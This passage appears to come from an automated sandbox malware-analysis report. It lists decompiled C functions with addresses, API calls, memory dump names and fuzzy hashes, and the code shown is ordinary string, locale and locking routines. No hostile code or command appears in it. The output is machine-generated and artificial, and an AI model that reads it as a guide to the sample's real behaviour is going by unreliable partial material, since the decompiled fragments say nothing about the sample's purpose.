      • Opcode Fuzzy Hash: 4d2df8bda681c98edc494ca8d381bc119e034c044b4dac1a79fb45ddd33e505c
      • Instruction Fuzzy Hash: 8AE012724107446FC721BBB5CD02857BB95EF463247408C3FF58553673DBB2A8619B90
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A2E10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009A2E10(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t12;
				char* _t19;
				intOrPtr _t23;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr* _t37;

				_t23 = _a4;
				_t37 = __ecx;
				_t12 =  *((intOrPtr*)(__ecx + 0x10));
				if((__ecx | 0xffffffff) - _t12 <= _t23) {
					_t12 = E00AC61C7("string too long");
				}
				if(_t23 == 0) {
					L15:
					return _t37;
				} else {
					_t32 = _t12 + _t23;
					if(_t32 > 0xfffffffe) {
						_t12 = E00AC61C7("string too long");
					}
					_t27 =  *((intOrPtr*)(_t37 + 0x14));
					if(_t27 >= _t32) {
						if(_t32 != 0) {
							goto L7;
						} else {
							 *((intOrPtr*)(_t37 + 0x10)) = _t32;
							if(_t27 < 0x10) {
								_t19 = _t37;
								 *_t19 = 0;
								return _t19;
							} else {
								 *((char*)( *_t37)) = 0;
								return _t37;
							}
						}
					} else {
						E009A2470(_t37, _t32, _t12);
						if(_t32 == 0) {
							L14:
							goto L15;
						} else {
							L7:
							E009A1F50(_t37,  *((intOrPtr*)(_t37 + 0x10)), _t23, _a8);
							 *((intOrPtr*)(_t37 + 0x10)) = _t32;
							if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
								 *((char*)(_t37 + _t32)) = 0;
								goto L14;
							} else {
								 *((char*)( *_t37 + _t32)) = 0;
								return _t37;
							}
						}
					}
				}
			}









      0x009a2e14
      0x009a2e18
      0x009a2e1a
      0x009a2e24
      0x009a2e2b
      0x009a2e2b
      0x009a2e32
      0x009a2eb0
      0x009a2eb5
      0x009a2e34
      0x009a2e35
      0x009a2e3b
      0x009a2e42
      0x009a2e42
      0x009a2e47
      0x009a2e4c
      0x009a2e85
      0x00000000
      0x009a2e87
      0x009a2e87
      0x009a2e8d
      0x009a2e9e
      0x009a2ea1
      0x009a2ea6
      0x009a2e8f
      0x009a2e92
      0x009a2e9a
      0x009a2e9a
      0x009a2e8d
      0x009a2e4e
      0x009a2e52
      0x009a2e59
      0x009a2eaf
      0x00000000
      0x009a2e5b
      0x009a2e5b
      0x009a2e66
      0x009a2e6f
      0x009a2e72
      0x009a2eab
      0x00000000
      0x009a2e74
      0x009a2e76
      0x009a2e80
      0x009a2e80
      0x009a2e72
      0x009a2e59
      0x009a2e4c

      APIs
      • std::_Xinvalid_argument.LIBCPMT ref: 009A2E2B
        • Part of subcall function 00AC61C7: std::exception::exception.LIBCMT ref: 00AC61DC
        • Part of subcall function 00AC61C7: __CxxThrowException@8.LIBCMT ref: 00AC61F1
      • std::_Xinvalid_argument.LIBCPMT ref: 009A2E42
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Xinvalid_argumentstd::_$Exception@8Throwstd::exception::exception
      • String ID: string too long
      • API String ID: 3336028256-2556327735
      • Opcode ID: 059901c1d0bb400c835ffdbbb8ef5a866249ea41a8c1435c0f9d4c7894a8fd08
      • Instruction ID: 2569a3c2ee34debc7edf75679360469d7e39e18affe3bd8c7142b0c2bb34ccb5
      • Opcode Fuzzy Hash: 059901c1d0bb400c835ffdbbb8ef5a866249ea41a8c1435c0f9d4c7894a8fd08
      • Instruction Fuzzy Hash: DA11D6333006105BD721AB5CE880A6AF7DDEFE6721F200A1FF592C7691C7A1984483E0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A2AD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
      Download Yara Rule
      C-Code - Quality: 67%
      			E009A2AD0(intOrPtr* __ecx, void* __edi, intOrPtr _a4, char _a8) {
				signed int _t11;
				signed int _t16;
				intOrPtr _t19;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr* _t28;
				void* _t29;

				_t25 = __edi;
				_t21 = __ecx;
				_t19 = _a4;
				_t28 = __ecx;
				if(_t19 > 0xfffffffe) {
					E00AC61C7("string too long");
				}
				_t11 =  *(_t28 + 0x14);
				if(_t11 >= _t19) {
					if(_a8 == 0 || _t19 >= 0x10) {
						if(_t19 == 0) {
							 *((intOrPtr*)(_t28 + 0x10)) = _t19;
							if(_t11 >= 0x10) {
								_t28 =  *_t28;
							}
							 *_t28 = 0;
						}
						asm("sbb eax, eax");
						return  ~_t11;
					} else {
						_push(_t25);
						_t26 =  *((intOrPtr*)(_t28 + 0x10));
						if(_t19 < _t26) {
							_t26 = _t19;
						}
						if(_t11 >= 0x10) {
							_t20 =  *_t28;
							if(_t26 != 0) {
								E00AAB080(_t28, _t20, _t26);
								_t29 = _t29 + 0xc;
							}
							_push(_t20);
							_t11 = E009A62C0();
							_t19 = _a4;
						}
						 *((intOrPtr*)(_t28 + 0x10)) = _t26;
						 *(_t28 + 0x14) = 0xf;
						 *((char*)(_t26 + _t28)) = 0;
						asm("sbb eax, eax");
						return  ~_t11;
					}
				} else {
					_t16 = E009A2470(_t21, _t19,  *((intOrPtr*)(_t28 + 0x10)));
					asm("sbb eax, eax");
					return  ~_t16;
				}
			}











      0x009a2ad0
      0x009a2ad0
      0x009a2ad4
      0x009a2ad8
      0x009a2add
      0x009a2ae4
      0x009a2ae4
      0x009a2ae9
      0x009a2aee
      0x009a2b0c
      0x009a2b5e
      0x009a2b60
      0x009a2b66
      0x009a2b68
      0x009a2b68
      0x009a2b6a
      0x009a2b6a
      0x009a2b71
      0x009a2b78
      0x009a2b13
      0x009a2b13
      0x009a2b14
      0x009a2b19
      0x009a2b1b
      0x009a2b1b
      0x009a2b20
      0x009a2b22
      0x009a2b26
      0x009a2b2b
      0x009a2b30
      0x009a2b30
      0x009a2b33
      0x009a2b34
      0x009a2b39
      0x009a2b3c
      0x009a2b3f
      0x009a2b42
      0x009a2b4b
      0x009a2b52
      0x009a2b59
      0x009a2b59
      0x009a2af0
      0x009a2af5
      0x009a2afe
      0x009a2b05
      0x009a2b05

      APIs
      • std::_Xinvalid_argument.LIBCPMT ref: 009A2AE4
        • Part of subcall function 00AC61C7: std::exception::exception.LIBCMT ref: 00AC61DC
        • Part of subcall function 00AC61C7: __CxxThrowException@8.LIBCMT ref: 00AC61F1
      • _memmove.LIBCMT ref: 009A2B2B
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
      • String ID: string too long
      • API String ID: 22950630-2556327735
      • Opcode ID: 509454e387d5bec71a50b47151ef79a4c4ee02c3b8b355b1d3fa0977acbafe6a
      • Instruction ID: e03ee0de3c486d2cd1477ca7b8fc68a2a96fcffbf2d554886cce8125da543131
      • Opcode Fuzzy Hash: 509454e387d5bec71a50b47151ef79a4c4ee02c3b8b355b1d3fa0977acbafe6a
      • Instruction Fuzzy Hash: 4D1193721043155BEB249E7CA8C1A6BB799AB53714F240A2EE493875C2D761E84886F0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A29E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009A29E0(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr _t16;
				intOrPtr* _t19;
				intOrPtr _t24;
				intOrPtr _t27;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t34;

				_t34 = __ecx;
				_t10 =  *((intOrPtr*)(__ecx + 0x10));
				_t24 = _a4;
				if(_t10 < _t24) {
					_t10 = E00AC6214("invalid string position");
				}
				_t31 = _a8;
				_t11 = _t10 - _t24;
				if(_t11 < _t31) {
					_t31 = _t11;
				}
				if(_t31 == 0) {
					L14:
					return _t34;
				} else {
					_t27 =  *((intOrPtr*)(_t34 + 0x14));
					if(_t27 < 0x10) {
						_t19 = _t34;
					} else {
						_t19 =  *_t34;
					}
					if(_t27 < 0x10) {
						_t28 = _t34;
					} else {
						_t28 =  *_t34;
					}
					E00AAB920(_t28 + _t24, _t19 + _t24 + _t31, _t11 - _t31);
					_t16 =  *((intOrPtr*)(_t34 + 0x10)) - _t31;
					 *((intOrPtr*)(_t34 + 0x10)) = _t16;
					if( *((intOrPtr*)(_t34 + 0x14)) < 0x10) {
						 *((char*)(_t34 + _t16)) = 0;
						goto L14;
					} else {
						 *((char*)( *_t34 + _t16)) = 0;
						return _t34;
					}
				}
			}












      0x009a29e4
      0x009a29e6
      0x009a29e9
      0x009a29ef
      0x009a29f6
      0x009a29f6
      0x009a29fb
      0x009a29fe
      0x009a2a02
      0x009a2a04
      0x009a2a04
      0x009a2a08
      0x009a2a5a
      0x009a2a5f
      0x009a2a0a
      0x009a2a0a
      0x009a2a11
      0x009a2a17
      0x009a2a13
      0x009a2a13
      0x009a2a13
      0x009a2a1c
      0x009a2a22
      0x009a2a1e
      0x009a2a1e
      0x009a2a1e
      0x009a2a2f
      0x009a2a3a
      0x009a2a40
      0x009a2a44
      0x009a2a56
      0x00000000
      0x009a2a46
      0x009a2a48
      0x009a2a51
      0x009a2a51
      0x009a2a44

      APIs
      • std::_Xinvalid_argument.LIBCPMT ref: 009A29F6
        • Part of subcall function 00AC6214: std::exception::exception.LIBCMT ref: 00AC6229
        • Part of subcall function 00AC6214: __CxxThrowException@8.LIBCMT ref: 00AC623E
      • _memmove.LIBCMT ref: 009A2A2F
      Strings
      • invalid string position, xrefs: 009A29F1
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
      • String ID: invalid string position
      • API String ID: 22950630-1799206989
      • Opcode ID: 9924e4c7808de36a52544d339ff2bc339ce45dc861076050e7b946cff2487efa
      • Instruction ID: 3dc2ca194054a837b28856029bf14292d1cdecd212882214f4bb77f3aa31631b
      • Opcode Fuzzy Hash: 9924e4c7808de36a52544d339ff2bc339ce45dc861076050e7b946cff2487efa
      • Instruction Fuzzy Hash: 8501D6323002418BC735CFACED8096BB3AAEB96710B24492DE185CB781D7B0EC42C7E0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009C2683 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48libraryloaderCOMMON
      Download Yara Rule
      C-Code - Quality: 43%
      			E009C2683(void* __ecx, intOrPtr __edx, intOrPtr __edi) {
				signed int _v8;
				signed short _v20;
				signed short _v24;
				char _v28;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t9;
				signed int _t11;
				intOrPtr _t22;
				intOrPtr* _t23;
				intOrPtr _t28;
				intOrPtr _t30;
				signed int _t31;
				signed int _t34;

				_t29 = __edi;
				_t28 = __edx;
				_t9 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t9 ^ _t34;
				_t11 =  *0xd08ba8; // 0x50052
				_t37 = _t11 - 0xffffffff;
				if(_t11 == 0xffffffff) {
					_push(_t22);
					_push(_t30);
					_t23 = GetProcAddress(L009A8501( *((intOrPtr*)( *((intOrPtr*)(E009BD77F(_t22, __edi, _t30, _t37) + 0x78))))), "DllGetVersion");
					_t31 = 0x40000;
					if(_t23 != 0) {
						E00AAB3F0( &_v28, 0, 0x14);
						_push( &_v28);
						_v28 = 0x14;
						if( *_t23() >= 0) {
							_t31 = (_v24 & 0x0000ffff) << 0x00000010 | _v20 & 0x0000ffff;
						}
					}
					 *0xd08ba8 = _t31;
					_t11 = _t31;
					_pop(_t30);
					_pop(_t22);
				}
				return E00AAB46A(_t11, _t22, _v8 ^ _t34, _t28, _t29, _t30);
			}


















      0x009c2683
      0x009c2683
      0x009c268b
      0x009c2692
      0x009c2695
      0x009c269a
      0x009c269d
      0x009c269f
      0x009c26a0
      0x009c26bc
      0x009c26be
      0x009c26c5
      0x009c26cf
      0x009c26da
      0x009c26db
      0x009c26e6
      0x009c26f3
      0x009c26f3
      0x009c26e6
      0x009c26f5
      0x009c26fb
      0x009c26fd
      0x009c26fe
      0x009c26fe
      0x009c270a

      APIs
      • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 009C26B6
      • _memset.LIBCMT ref: 009C26CF
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressProc_memset
      • String ID: DllGetVersion
      • API String ID: 2593635937-2861820592
      • Opcode ID: dc6517d4dfbdfac82f8209bf9620c28f6987fdcef5aef1f1727908ec017e539b
      • Instruction ID: 91f40d2cd70bc5a9aab90e0aff554304266befa7419b4cae15c997e47de9a87b
      • Opcode Fuzzy Hash: dc6517d4dfbdfac82f8209bf9620c28f6987fdcef5aef1f1727908ec017e539b
      • Instruction Fuzzy Hash: 2C0171B1E00319AFDB00EBACDD86BDEB7E8AB08714F500126FA14E7291DB709D4497B5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B1D72 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
      Download Yara Rule
      C-Code - Quality: 66%
      			E009B1D72(intOrPtr __ebx, void* __ecx) {
				signed int _v8;
				char _v20;
				char _v280;
				void* __edi;
				void* __esi;
				signed int _t9;
				long _t12;
				intOrPtr _t13;
				intOrPtr _t19;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t29;
				signed int _t34;

				_t19 = __ebx;
				_t32 = _t34;
				_t9 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t9 ^ _t34;
				_t12 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t12 == 0) {
					L4:
					_t13 = 0;
					__eflags = 0;
				} else {
					_t38 = _t12 - 0x104;
					if(_t12 == 0x104) {
						goto L4;
					} else {
						 *(PathFindExtensionA( &_v280)) = 0;
						asm("movsd");
						asm("movsd");
						asm("movsb");
						_t13 = E009B1BA3( &_v280, _t38,  &_v20,  &_v280);
						_t25 = _t25;
					}
				}
				_pop(_t29);
				return E00AAB46A(_t13, _t19, _v8 ^ _t32, _t24, _t25, _t29);
			}
















      0x009b1d72
      0x009b1d75
      0x009b1d7d
      0x009b1d84
      0x009b1d9a
      0x009b1da2
      0x009b1dd7
      0x009b1dd7
      0x009b1dd7
      0x009b1da4
      0x009b1da4
      0x009b1da6
      0x00000000
      0x009b1da8
      0x009b1db6
      0x009b1dc1
      0x009b1dc8
      0x009b1dce
      0x009b1dcf
      0x009b1dd4
      0x009b1dd4
      0x009b1da6
      0x009b1dde
      0x009b1de5

      APIs
      • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 009B1D9A
      • PathFindExtensionA.SHLWAPI(?), ref: 009B1DB0
        • Part of subcall function 009B1BA3: GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 009B1BE8
        • Part of subcall function 009B1BA3: _memset.LIBCMT ref: 009B1C14
        • Part of subcall function 009B1BA3: _wcstoul.LIBCMT ref: 009B1C5C
        • Part of subcall function 009B1BA3: _wcslen.LIBCMT ref: 009B1C7D
        • Part of subcall function 009B1BA3: GetUserDefaultUILanguage.KERNEL32 ref: 009B1C8D
        • Part of subcall function 009B1BA3: ConvertDefaultLocale.KERNEL32(?), ref: 009B1CB4
        • Part of subcall function 009B1BA3: ConvertDefaultLocale.KERNEL32(?), ref: 009B1CC3
        • Part of subcall function 009B1BA3: GetSystemDefaultUILanguage.KERNEL32 ref: 009B1CCC
        • Part of subcall function 009B1BA3: ConvertDefaultLocale.KERNEL32(?), ref: 009B1CE8
        • Part of subcall function 009B1BA3: ConvertDefaultLocale.KERNEL32(?), ref: 009B1CF7
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Default$ConvertLocale$Language$AddressExtensionFileFindModuleNamePathProcSystemUser_memset_wcslen_wcstoul
      • String ID: %s%s.dll
      • API String ID: 1415830068-1649984862
      • Opcode ID: 9d4bc44fb303eb7ad5b3d628ff456df3fe371ddae20f49f18ffcc474369bc51f
      • Instruction ID: 3d6c0ec538e50cc0317814ff98fe50629288dc2528dbfed3cfe2ab0dd0a28eea
      • Opcode Fuzzy Hash: 9d4bc44fb303eb7ad5b3d628ff456df3fe371ddae20f49f18ffcc474369bc51f
      • Instruction Fuzzy Hash: B801A47290111CABCB14DB68ED56BEF77FCAB89710F4104A5A506E7150EB709E448BA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009C2A0C Relevance: 5.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 100%
      			E009C2A0C(signed int _a4) {
				void* __ebp;
				struct _CRITICAL_SECTION* _t4;
				void* _t8;
				signed int _t9;
				intOrPtr* _t12;

				_t9 = _a4;
				if(_t9 >= 0x11) {
					_t4 = E009B8782(_t8);
				}
				if( *0xd0ffe8 == 0) {
					_t4 = E009C29A3();
				}
				_t12 = 0xd101a0 + _t9 * 4;
				if( *_t12 == 0) {
					EnterCriticalSection(0xd10188);
					if( *_t12 == 0) {
						_t4 = 0xd0fff0 + _t9 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t12 =  *_t12 + 1;
					}
					LeaveCriticalSection(0xd10188);
				}
				EnterCriticalSection(0xd0fff0 + _t9 * 0x18);
				return _t4;
			}








      0x009c2a14
      0x009c2a1a
      0x009c2a1c
      0x009c2a1c
      0x009c2a28
      0x009c2a2a
      0x009c2a2a
      0x009c2a35
      0x009c2a3f
      0x009c2a46
      0x009c2a4b
      0x009c2a52
      0x009c2a58
      0x009c2a5e
      0x009c2a5e
      0x009c2a65
      0x009c2a65
      0x009c2a75
      0x009c2a7b

      APIs
      • EnterCriticalSection.KERNEL32(00D10188,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A46
      • InitializeCriticalSection.KERNEL32(?,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A58
      • LeaveCriticalSection.KERNEL32(00D10188,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A65
      • EnterCriticalSection.KERNEL32(?,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A75
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
      • String ID:
      • API String ID: 3253506028-0
      • Opcode ID: e76e5e34c63d338b27f823262b539ae6502322aefbbd36f24c296883cfec9c0d
      • Instruction ID: 3c01899446934bcee7d19a7f5d6e7c53dd4e729ac7474d9d15b3f939ec7acf85
      • Opcode Fuzzy Hash: e76e5e34c63d338b27f823262b539ae6502322aefbbd36f24c296883cfec9c0d
      • Instruction Fuzzy Hash: 05F0C272A00206BFC7206B99EC49B59BB59EFD1351F24002AF04487192CF7499C5C6B6
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009BC85D Relevance: 5.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 100%
      			E009BC85D(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x1c
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0 || _t14 >= _t16[3]) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				} else {
					_t9 = TlsGetValue( *_t16);
					if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
						goto L5;
					} else {
						LeaveCriticalSection(_t12);
						return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
					}
				}
			}







      0x009bc864
      0x009bc867
      0x009bc867
      0x009bc86b
      0x009bc871
      0x009bc876
      0x009bc89f
      0x009bc8a0
      0x00000000
      0x009bc87d
      0x009bc87f
      0x009bc887
      0x00000000
      0x009bc88e
      0x009bc895
      0x00000000
      0x009bc89b
      0x009bc887

      APIs
      • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,009BCE24,?,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA,00000004), ref: 009BC86B
      • TlsGetValue.KERNEL32(00000000,?,?,?,?,009BCE24,?,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA,00000004), ref: 009BC87F
      • LeaveCriticalSection.KERNEL32(0000001C,?,?,?,?,009BCE24,?,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA,00000004), ref: 009BC895
      • LeaveCriticalSection.KERNEL32(0000001C,?,?,?,?,009BCE24,?,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA,00000004), ref: 009BC8A0
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$Leave$EnterValue
      • String ID:
      • API String ID: 3969253408-0
      • Opcode ID: de07460498d1bb5793463ef133fbf80058b57865e9c15b7780b43e436e31832c
      • Instruction ID: c765486f1d34ef221e832b1aff1967e271b38af3614101f33643ca7a8b0ec8a4
      • Opcode Fuzzy Hash: de07460498d1bb5793463ef133fbf80058b57865e9c15b7780b43e436e31832c
